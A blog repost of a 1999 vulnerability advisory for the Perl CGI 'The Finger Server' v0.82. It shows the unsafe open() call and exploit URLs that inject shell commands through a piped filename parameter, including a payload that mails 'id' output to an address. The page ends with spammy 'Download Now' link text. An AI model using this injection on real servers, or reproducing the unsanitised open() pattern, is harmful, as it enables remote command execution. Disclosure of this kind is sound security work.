Home >Unlabelled > "The Finger Server" execute shell commands
"The Finger Server" execute shell commands
Posted on 8 Mei 2010 by c0decstuff
Vulnerability
"The Finger Server"
Affected
"The Finger Server"
Description
Iain Wade found following. In 1999. he was tinkering w/ The Finger Server v0.82 and came across some bugs which let you execute shell commands under the privileges of the web server.It's available at
glazed.org It's just another case of perl doing it's magic on an open() call.There is undoubtably other problems, but here's the offending code exploited here is:
open (PLANS, "$plan_path$filename") ||
do { print "Can't open $plan_path$filename: $!";
return;
};
It is called with the following arguments;
finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan It does minimal checking before there, really only making sure the username is valid, but for example by using:
finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|
you can execute whatever... The output will not get to you (the web client) obviously if you use |
however get executed... So an example to test it could be
|id|mail+email@address|
Surrounding it in pipes is the only way one could get it to execute, otherwise it would return open errors
One Response to “c0decstuff”
Total Pageviews
Labels
- Android (1)
- Aplication (14)
- ARP (1)
- Backdoored (2)
- Browser (1)
- Cloud (1)
- Exploitation (1)
- Exploits (7)
- Facebook (2)
- forensics (3)
- Hacking (11)
- Hijacking (1)
- Honeypot (1)
- HTML5 (1)
- ios (2)
- Jailbreak (2)
- Linux (1)
- Malware (5)
- metasploit (2)
- Meterpreter (1)
- Movie (1)
- Networking (1)
- News (2)
- password attack (2)
- Penetration Test (2)
- Python (1)
- reverse engineering (1)
- Rootkits (1)
- Security (12)
- shellcode (2)
- Stuxnet/Duqu (2)
- Uncategories (1)
- Virus (1)
- Vulnerability (8)
- Web (5)
- Wifi (1)
- Windows (5)
Blog Archive
-
▼
10
(67)
-
▼
Mei
(10)
- New search engine: heaven for skiddies
- Cracking Wep Wpa Wireless Network
- ipv6hackit
- PenTBox : simple n smart security tools
- "The Finger Server" execute shell commands
- Mail Crawler
- effective SQL Injection Tool (mysql&mssql)
- HowTo: Windows XP VPN Into Remote Location
- BruteMonkey Gmail Bruteforce/Dictionary Attack
- securing Web with application firewall
-
▼
Mei
(10)
Friendlist
Security Resources
-
-
-
This feed contains no entries
-
-
-
-
-
-
-
-
-
"The Finger Server" Execute Shell Commands >>>>> Download Now
>>>>> Download Full
"The Finger Server" Execute Shell Commands >>>>> Download LINK
>>>>> Download Now
"The Finger Server" Execute Shell Commands >>>>> Download Full
>>>>> Download LINK eQ